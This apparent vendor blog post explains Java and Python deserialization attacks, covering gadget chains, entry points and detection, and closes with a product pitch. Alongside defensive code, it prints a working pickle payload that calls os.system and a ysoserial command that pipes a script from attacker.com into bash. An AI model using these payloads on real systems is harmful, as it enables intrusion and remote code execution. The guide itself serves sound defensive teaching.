Deserialization vulnerabilities have been responsible for some of the most impactful breaches in the last decade. Apache Struts, Jenkins, WebLogic, JBoss -- the list of major platforms compromised through deserialization is long. The attack is conceptually simple: send specially crafted serialized data to an application that deserializes it without validation, and achieve remote code execution.
What makes deserialization attacks so dangerous is that they target a fundamental operation. Serialization converts objects to bytes for storage or transmission. Deserialization converts those bytes back to objects. Every application that receives data from external sources potentially deserializes it. And in many languages, deserialization can trigger arbitrary code execution by design.
Java Deserialization
Java's native serialization (ObjectInputStream) is the most notorious source of deserialization vulnerabilities. When Java deserializes an object, it invokes methods defined by that object's class: readObject() and readResolve() while the stream is being read, and finalize() later when the object is garbage collected. If any of those methods performs dangerous operations, the attacker controls those operations through the serialized data.
The gadget chain concept. Attackers do not need to find a class with a directly exploitable readObject() method. Instead, they chain together multiple classes (gadgets) that are already on the application's classpath. Each gadget performs a small operation, and chaining them together achieves code execution.
The classic example is the Apache Commons Collections gadget chain:
- A HashMap calls hashCode() on its keys during deserialization
- The key is a TiedMapEntry whose hashCode() calls getValue() on a LazyMap
- The LazyMap calls transform() on a ChainedTransformer
- The ChainedTransformer chains ConstantTransformer, InvokerTransformer, etc.
- The final transformer calls Runtime.exec() with the attacker's command
The attacker constructs a serialized HashMap containing this chain. When the application deserializes it, the chain triggers and the command executes.
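The way an innocent-looking hash computation can cascade into a method call is easier to see in a toy model. The sketch below is a Python analogy only, not the Commons Collections code: the class names mirror the Java ones for readability, the behavior is simplified, and a plain list named executed (a stand-in chosen for this example) takes the place of Runtime.exec().

```python
# Toy analogy of the gadget chain above. These are NOT the real
# Commons Collections classes; names are reused only for readability.

class ConstantTransformer:
    """Ignores its input and returns a fixed object."""
    def __init__(self, constant):
        self.constant = constant

    def transform(self, _value):
        return self.constant


class InvokerTransformer:
    """Calls a named method on whatever object it receives."""
    def __init__(self, method_name, args=()):
        self.method_name = method_name
        self.args = args

    def transform(self, value):
        return getattr(value, self.method_name)(*self.args)


class ChainedTransformer:
    """Feeds the output of each transformer into the next one."""
    def __init__(self, transformers):
        self.transformers = transformers

    def transform(self, value):
        for transformer in self.transformers:
            value = transformer.transform(value)
        return value


class LazyMap:
    """Creates missing values on demand by calling a factory."""
    def __init__(self, factory):
        self.data = {}
        self.factory = factory

    def get(self, key):
        if key not in self.data:
            self.data[key] = self.factory.transform(key)
        return self.data[key]


class TiedMapEntry:
    """Its hash depends on a value looked up in the lazy map."""
    def __init__(self, lazy_map, key):
        self.lazy_map = lazy_map
        self.key = key

    def get_value(self):
        return self.lazy_map.get(self.key)

    def __hash__(self):
        return hash(self.key) ^ hash(self.get_value())


executed = []  # stand-in for Runtime.exec(): records the "command"

chain = ChainedTransformer([
    ConstantTransformer(executed),          # yields the target object
    InvokerTransformer("append", ("id",)),  # calls target.append("id")
])
entry = TiedMapEntry(LazyMap(chain), "k")

# Using the entry as a dict key hashes it, which walks the whole chain.
table = {entry: "v"}
print(executed)
```

No class here is dangerous in isolation. The side effect only appears once the objects are wired together and something hashes the entry, which is what a hash map does while rebuilding itself from a serialized stream.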
Common vulnerable entry points:
- RMI (Remote Method Invocation) endpoints
- JMX (Java Management Extensions) over RMI
- Custom network protocols using Java serialization
- HTTP parameters or cookies containing Base64-encoded serialized objects
- Message queues (JMS) using Java serialization
- Caching systems (Ehcache, Hazelcast) using Java serialization
Detection indicators:
- Binary data starting with AC ED 00 05 (Java serialization magic bytes)
- Base64-encoded data that decodes to the above magic bytes
- The string rO0AB at the start of Base64 data (Base64-encoded Java serialization header)
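The indicators above can be turned into a simple check on incoming values such as cookies or request bodies. This is a minimal sketch; the function name looks_like_java_serialized is made up for this example, and it only inspects the start of the data, so a serialized object embedded deeper in a payload would not be caught.

```python
import base64

JAVA_MAGIC = bytes.fromhex("ACED0005")  # stream magic + version
JAVA_MAGIC_B64 = b"rO0AB"               # how those bytes begin in Base64


def looks_like_java_serialized(data: bytes) -> bool:
    """Return True if data starts with the Java serialization header,
    either as raw bytes or as Base64 text."""
    if data.startswith(JAVA_MAGIC):
        return True
    return data.lstrip().startswith(JAVA_MAGIC_B64)


# Example: a header followed by two arbitrary bytes, raw and encoded.
raw_sample = JAVA_MAGIC + b"sr"
b64_sample = base64.b64encode(raw_sample)

print(looks_like_java_serialized(raw_sample))
print(looks_like_java_serialized(b64_sample))
print(looks_like_java_serialized(b'{"json": true}'))
```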
Python Pickle Deserialization
Python's pickle module is explicitly documented as insecure: "The pickle module is not secure. Only unpickle data you trust." Despite this warning, pickle deserialization of untrusted data appears in production code regularly.
Pickle exploitation is straightforward. The __reduce__ method defines how an object should be reconstructed during unpickling. An attacker creates a class with a __reduce__ method that returns a tuple of (os.system, ("malicious command",)), serializes it, and sends it to the application.
import pickle
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ("id",))

payload = pickle.dumps(Exploit())
# Send payload to vulnerable endpoint
When the application calls pickle.loads(payload), Python calls os.system("id").
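The same mechanism can be observed safely by swapping os.system for a harmless builtin. In this sketch the class name Harmless is invented for illustration. It shows that the unpickled value is whatever the callable returns, and that the payload can be inspected with pickletools without executing it.

```python
import pickle
import pickletools


class Harmless:
    def __reduce__(self):
        # Ask pickle to "rebuild" this object by calling len("abc").
        return (len, ("abc",))


payload = pickle.dumps(Harmless())

# Unpickling runs the callable; the result is not a Harmless instance.
result = pickle.loads(payload)
print(result)

# Walk the opcodes without executing them. REDUCE is the opcode that
# calls a callable with arguments taken from the pickle stack.
opcodes = [opcode.name for opcode, _arg, _pos in pickletools.genops(payload)]
print("REDUCE" in opcodes)
```

A REDUCE opcode is not malicious by itself, since many legitimate objects pickle this way. What matters is which callable it invokes.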
Common vulnerable entry points:
- Flask session cookies using pickle serialization (default in older versions)
- Celery task serialization configured to use pickle
- Redis or memcached caching with pickle serialization
- Machine learning model loading using pickle.load()
- Data interchange between Python services
- Scientific computing pipelines loading .pkl files
Other dangerous Python deserializers:
- yaml.load() (without Loader=SafeLoader) executes arbitrary Python through !!python/object/apply:
- jsonpickle deserializes arbitrary Python objects from JSON
- shelve uses pickle internally
Exploitation Tools
ysoserial (Java). The standard tool for generating Java deserialization payloads. It includes dozens of gadget chains for common libraries:
java -jar ysoserial.jar CommonsCollections1 "curl http://attacker.com/shell.sh | bash"
This generates a serialized Java object containing the CommonsCollections1 gadget chain that executes the specified command.
ysoserial.net (.NET). The .NET equivalent for BinaryFormatter, ObjectStateFormatter, SoapFormatter, and other .NET serializers.
pimpmykali/pickle-exploit. Various tools generate malicious pickle payloads for Python deserialization attacks.
GadgetProbe. Identifies classes available on the remote classpath by sending serialized probe objects that trigger a DNS callback only when a given class can be loaded, helping attackers determine which gadget chains will work.
Prevention: Java
Do not use Java native serialization. This is the most effective defense. Use JSON, Protocol Buffers, or other format-specific serializers that do not execute arbitrary code during parsing.
If you must use Java serialization:
- ObjectInputFilter (Java 9+). Configure a filter that restricts which classes can be deserialized:
ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
    "com.myapp.model.*;!*"
);
ObjectInputStream ois = new ObjectInputStream(input);
ois.setObjectInputFilter(filter);
- Look-ahead deserialization. Inspect the serialized stream before deserializing. Libraries like Apache Commons IO's ValidatingObjectInputStream and notsoserial provide this capability.
- Remove dangerous gadget libraries. If your application does not use Apache Commons Collections, remove it from the classpath. Fewer libraries mean fewer available gadget chains. However, this is not sufficient as a sole defense -- new gadget chains using common libraries are discovered regularly.
- Use a serialization firewall. Contrast Security and other RASP (Runtime Application Self-Protection) solutions can detect and block deserialization attacks at runtime.
Prevention: Python
Never unpickle untrusted data. Use JSON for data interchange. If you need to serialize Python objects, use a safe serializer:
import json
import pickle

# SAFE: JSON serialization
data = json.loads(user_input)

# DANGEROUS: Pickle deserialization
data = pickle.loads(user_input)  # Never do this with untrusted input
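Where pickle cannot be removed right away, the standard library lets you subclass pickle.Unpickler and override find_class() to allowlist the globals a stream may reference. The sketch below follows that pattern; the names ALLOWED_GLOBALS, RestrictedUnpickler and restricted_loads, and the contents of the allowlist, are assumptions for this example. Treat it as a way to reduce exposure, not as a guarantee of safety.

```python
import io
import pickle
from collections import OrderedDict

# Hypothetical allowlist: only these (module, name) pairs may be resolved.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the stream asks for a global such as os.system.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"global '{module}.{name}' is not on the allowlist"
        )


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads() that enforces the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Plain containers need no globals, and OrderedDict is allowlisted.
print(restricted_loads(pickle.dumps({"a": [1, 2]})))
print(restricted_loads(pickle.dumps(OrderedDict(x=1))))
```

A payload built with __reduce__ that references any other callable, for example os.system or even len, fails with pickle.UnpicklingError before the callable is looked up.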
Configure safe YAML loading:
import yaml
# SAFE
data = yaml.safe_load(user_input)
# DANGEROUS
data = yaml.load(user_input, Loader=yaml.FullLoader) # Still risky
data = yaml.load(user_input)  # Extremely dangerous before PyYAML 5.1; raises TypeError in PyYAML 6+, where Loader is required
Configure Celery to use JSON:
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
Flask session security:
# Use server-side sessions or ensure session data uses JSON, not pickle
# Modern Flask uses itsdangerous with JSON by default
Machine learning model loading. Loading ML models from untrusted sources is inherently dangerous because most model formats (pickle, joblib, SavedModel) can execute arbitrary code. Verify model integrity with checksums and load only from trusted sources.
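A checksum check before loading might look like the sketch below. The function name load_verified_model is hypothetical, and the expected digest is assumed to come from a trusted channel such as a signed release manifest. A matching digest only proves the file is the one you pinned; it says nothing about whether that file was safe in the first place.

```python
import hashlib
import hmac
import pickle


def load_verified_model(path: str, expected_sha256: str):
    """Unpickle a model file only if its SHA-256 digest matches the pin."""
    # Read once and hash the same bytes that get unpickled, so the file
    # cannot be swapped between the check and the load.
    with open(path, "rb") as fh:
        data = fh.read()

    actual = hashlib.sha256(data).hexdigest()
    if not hmac.compare_digest(actual, expected_sha256.lower()):
        raise ValueError("model file does not match the pinned SHA-256 digest")

    return pickle.loads(data)
```

Usage would be along the lines of load_verified_model("model.pkl", pinned_digest), where both the path and pinned_digest are placeholders supplied by your deployment configuration.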
Detection and Monitoring
- Monitor for deserialization magic bytes in HTTP traffic
- Log deserialization operations and the classes being deserialized
- Alert on deserialization of classes outside the expected allowlist
- Use RASP solutions that can detect and block deserialization attacks in real-time
- Scan code for ObjectInputStream, pickle.loads, yaml.load, and other dangerous calls
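For Python code, the scanning step can be approximated with the standard ast module. The following is a rough sketch, not a replacement for a real static analyzer: the DANGEROUS_CALLS set and the function name find_dangerous_calls are choices made for this example, and it only matches calls written as module.function(...), so aliased imports such as "from pickle import loads" are missed.

```python
import ast

# (module, function) pairs to flag; extend as needed.
DANGEROUS_CALLS = {
    ("pickle", "load"),
    ("pickle", "loads"),
    ("yaml", "load"),
    ("jsonpickle", "decode"),
    ("shelve", "open"),
}


def find_dangerous_calls(source: str, filename: str = "<string>"):
    """Return sorted (line_number, call_name) pairs for flagged calls."""
    findings = []
    tree = ast.parse(source, filename=filename)
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Match the simple pattern: name.attribute(...)
        if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
            target = (func.value.id, func.attr)
            if target in DANGEROUS_CALLS:
                findings.append((node.lineno, f"{target[0]}.{target[1]}"))
    return sorted(findings)


sample = (
    "import pickle, yaml\n"
    "x = pickle.loads(blob)\n"
    "y = yaml.safe_load(text)\n"
    "z = yaml.load(text)\n"
)
findings = find_dangerous_calls(sample)
print(findings)
```

The sample is parsed, never executed, so the undefined names in it do not matter. yaml.safe_load on line 3 is deliberately not flagged.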
How Safeguard.sh Helps
Safeguard.sh is particularly valuable for deserialization defense because the vulnerability often lies in third-party libraries on your classpath. Gadget chains use classes from libraries like Apache Commons Collections, Spring Framework, and other common dependencies. Safeguard.sh tracks which versions of these libraries have known gadget chains and alerts when your SBOM includes vulnerable versions. By providing continuous monitoring of your dependency tree, Safeguard.sh helps you remove or update the libraries that make deserialization attacks possible.